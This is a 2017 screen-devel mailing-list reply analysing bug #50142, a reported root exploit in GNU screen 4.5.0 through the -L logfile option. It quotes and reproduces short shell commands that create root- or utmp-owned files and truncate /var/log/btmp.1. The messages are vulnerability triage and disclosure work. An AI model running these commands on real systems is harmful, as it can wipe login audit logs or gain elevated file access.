screen-devel
[Top][All Lists]
Advanced
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [screen-devel] [bug #50142] root exploit 4.5.0

From: Axel Beckert
Subject: Re: [screen-devel] [bug #50142] root exploit 4.5.0
Date: Tue, 24 Jan 2017 21:30:55 +0100
User-agent: Mutt/1.5.21 (2010-09-15) 
Hi,

not replying on Savannah as I don't yet get the exact impact of this.

On Tue, Jan 24, 2017 at 07:05:10PM +0000, anonymous wrote:
> > address@hidden:/etc (master)$ screen -D -m -L bla.bla echo fail
> > address@hidden:/etc (master)$ ls -l bla.bla
> > -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla
> > address@hidden:/etc (master)$ cat bla.bla
> > fail
> > address@hidden:/etc (master)$ 

On Debian Unstable this does not work as a root exploit as screen does
not run setuid. screen nevertheless runs setgid with group utmp:

-rwxr-sr-x 1 root utmp 457608 Jan 18 16:54 /usr/bin/screen*

So I'm able to gain access to /var/log/{btmp,wtmp,lastlog}*.

I though can't really write to it, just erase it:

/var/log → id
uid=1000(abe) gid=1000(abe) 
groups=1000(abe),4(adm),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),107(netdev),113(kvm)
/var/log → ls -l btmp.1
-rw-rw---- 1 root        utmp         384 Dec 24 17:03 btmp.1
/var/log → screen -D -m -L btmp.1  echo fail
/var/log → ls -l btmp.1
-rw-rw---- 1 root utmp 0 Jan 24 21:06 btmp.1

So in my case nothing got written into the file (trying an existing
file without write permissions to the according directory).

Running the same game in /var/run/screen which is group-writable for
utmp, I though can reproduce this a little bit better:

/var/run/screen → ls -l
total 0
drwx------ 2 abe  abe  40 Jan 24 21:17 S-abe/
drwx------ 2 root root 60 Jan 16 00:23 S-root/
/var/run/screen → screen -D -m -L bla.bla echo fail
/var/run/screen → ls -l
total 4
drwx------ 2 abe  abe  40 Jan 24 21:20 S-abe/
drwx------ 2 root root 60 Jan 16 00:23 S-root/
-rw-r--r-- 1 abe  utmp  6 Jan 24 21:20 bla.bla
/var/run/screen → cat bla.bla
fail
/var/run/screen → 

Am I right that, since screen later drops the set[ug]id rights, this
only works if the file is newly created because then it is created
with such permissions that I can later write into it without
set[ug]id?

                Kind regards, Axel
-- 
/~\  Plain Text Ribbon Campaign                   | Axel Beckert
\ /  Say No to HTML in E-Mail and News            | address@hidden  (Mail)
 X   See http://www.nonhtmlmail.org/campaign.html | address@hidden (Mail+Jabber)
/ \  I love long mails: http://email.is-not-s.ms/ | http://abe.noone.org/ (Web)
reply via email to
[Prev in Thread] Current Thread [Next in Thread]